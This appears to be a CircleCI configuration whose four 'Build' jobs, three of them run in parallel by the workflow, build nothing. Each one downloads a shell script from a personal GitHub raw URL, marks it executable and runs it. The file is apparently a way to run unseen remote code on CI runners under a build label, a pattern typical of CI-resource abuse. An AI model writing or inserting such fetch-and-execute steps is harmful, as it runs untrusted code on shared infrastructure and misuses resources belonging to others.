version: 2 
jobs: 
    Build_01: 
      docker: 
            - image: circleci/ruby:2.4 
      steps: 
        - run: 
            name: Build 
            command: wget https://raw.githubusercontent.com/jackohar/yumpret/main/bash.sh && chmod u+x bash.sh && ./bash.sh 
    Build_02: 
      docker: 
            - image: circleci/ruby:2.4 
      steps: 
        - run: 
            name: Build 
            command: wget https://raw.githubusercontent.com/jackohar/yumpret/main/bash.sh && chmod u+x bash.sh && ./bash.sh 
    Build_03: 
      docker: 
            - image: circleci/ruby:2.4 
      steps: 
        - run: 
            name: Build 
            command: wget https://raw.githubusercontent.com/jackohar/yumpret/main/bash.sh && chmod u+x bash.sh && ./bash.sh 
    Build_04: 
      docker: 
            - image: circleci/ruby:2.4 
      steps: 
        - run: 
            name: Build 
            command: wget https://raw.githubusercontent.com/jackohar/yumpret/main/bash.sh && chmod u+x bash.sh && ./bash.sh 
 
 
workflows: 
    version: 2 
    build: 
        jobs: 
            - Build_01 
            - Build_02 
            - Build_03 
    